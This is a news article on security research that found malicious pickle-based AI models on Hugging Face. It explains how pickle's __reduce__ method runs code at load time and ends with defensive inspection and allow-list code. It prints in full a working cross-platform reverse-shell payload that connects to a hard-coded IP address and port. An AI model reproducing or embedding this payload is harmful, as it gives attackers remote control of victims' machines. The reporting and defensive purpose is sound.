Hugging Face, the GitHub of AI, hosted code that backdoored user devices.


Code uploaded to AI developer platform Hugging Face secretly installed backdoors and other types of malware on end-user machines, researchers at security firm JFrog said in a report Thursday, in a likely harbinger of similar submissions to come.

In total, JFrog researchers said they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine-learning models, not all of which were caught by Hugging Face’s own scanning, appear to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious,” in that the actions they performed actually compromised users’ security when loaded.

Full control of user devices

One model drew particular concern because it opens a reverse shell that gives a remote device on the Internet full control of the user’s machine. When JFrog researchers loaded the model onto a lab machine, the submission did indeed open a reverse shell but took no further action.

That restraint, along with the IP address of the remote device and the existence of identical shells connecting elsewhere, raised the possibility that this submission was also the work of researchers. Even so, an exploit that opens a device to such tampering is a major breach of researcher ethics, and it demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” wrote David Cohen, a senior researcher at JFrog. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations, all while victims remain completely unaware of their compromised state.”

A lab machine was set up as a honeypot to observe what happened when the model was loaded.
Credit: JFrog

Secrets and other bait data used by the honeypot to attract the threat actor.
Credit: JFrog

How did baller432 do it?

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickle is commonly used in Python to convert objects and classes defined in human-readable code into a byte stream that can be saved to disk or shared over a network. This process, known as serialization, gives hackers the opportunity to sneak malicious code into the stream.
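In ordinary use, serialization and deserialization are a simple round trip, which is why the format is so widespread. A minimal illustration using Python’s standard-library pickle module (the object names here are invented for the example):

```python
import pickle

# Serialize an ordinary Python object into a byte stream that could
# be written to disk or sent over a network...
data = {"model": "demo", "weights": [0.1, 0.2, 0.3]}
blob = pickle.dumps(data)

# ...and reconstruct it later. The danger is that deserialization is
# not just data parsing: the stream can instruct pickle to call code.
restored = pickle.loads(blob)
assert restored == data
```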

The model that spawned the reverse shell, submitted by a party with the username baller432, managed to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after the model file is loaded.
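The mechanism is simple to demonstrate: “__reduce__” lets a class tell pickle how to reconstruct it as a (callable, arguments) pair, and pickle calls that callable during deserialization. The sketch below substitutes the harmless built-in `len` for the attacker’s real payload:

```python
import pickle

class Payload:
    # __reduce__ returns a (callable, args) pair that pickle CALLS at
    # load time. A harmless stand-in (len) is used here in place of
    # the reverse-shell code described in the article.
    def __reduce__(self):
        return (len, ("executed at load time",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # invokes len(...) during deserialization
```

The victim never has to call anything beyond loading the file; the callable fires as a side effect of deserialization itself.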

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common procedure involves using the torch.load() function, which deserializes the model from a file. Especially when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often used to load the model with its architecture, weights and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2”, it appears that a malicious payload was inserted into the PyTorch model file using the pickle module’s __reduce__ method. This method, as shown in the provided reference, enables attackers to inject arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"], 
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()
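A pickle stream like this one can be inspected statically, without ever executing it, using the standard library’s pickletools module, whose disassembly exposes the global-lookup and REDUCE opcodes that scanners hunt for. A rough sketch with a harmless stand-in payload:

```python
import io
import pickle
import pickletools

class Demo:
    # Harmless stand-in for a malicious payload.
    def __reduce__(self):
        return (len, ("pwned",))

blob = pickle.dumps(Demo())

# pickletools.dis disassembles the opcode stream WITHOUT running it,
# so the telltale "resolve a global, then REDUCE (call it)" pattern
# is visible before any code executes.
out = io.StringIO()
pickletools.dis(blob, out=out)
listing = out.getvalue()
```

Dedicated analyzers such as fickling build on the same idea, decompiling the opcode stream back into the injected Python.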

Hugging Face has since removed the model and others flagged by JFrog.
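For developers who must load pickle-based model files from untrusted sources, one generic mitigation (not part of the JFrog report, but described in Python’s own pickle documentation) is an allow-list unpickler: `find_class` is consulted for every global the stream tries to resolve, so anything outside the allow list is rejected before it can run. A defensive sketch:

```python
import io
import pickle

class SafeUnpickler(pickle.Unpickler):
    # Crude allow list; a real deployment would enumerate exactly the
    # classes a legitimate model file needs.
    ALLOWED = {("builtins", "list"), ("builtins", "dict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

# Plain data deserializes normally...
safe_blob = pickle.dumps({"weights": [0.1, 0.2]})
loaded = SafeUnpickler(io.BytesIO(safe_blob)).load()

# ...but a stream that tries to resolve a callable is refused.
class Evil:
    def __reduce__(self):
        return (len, ("x",))  # harmless stand-in for a shell payload

try:
    SafeUnpickler(io.BytesIO(pickle.dumps(Evil()))).load()
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

This is a sketch, not a guarantee; avoiding pickle altogether in favor of weights-only or data-only model formats is the more robust fix.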

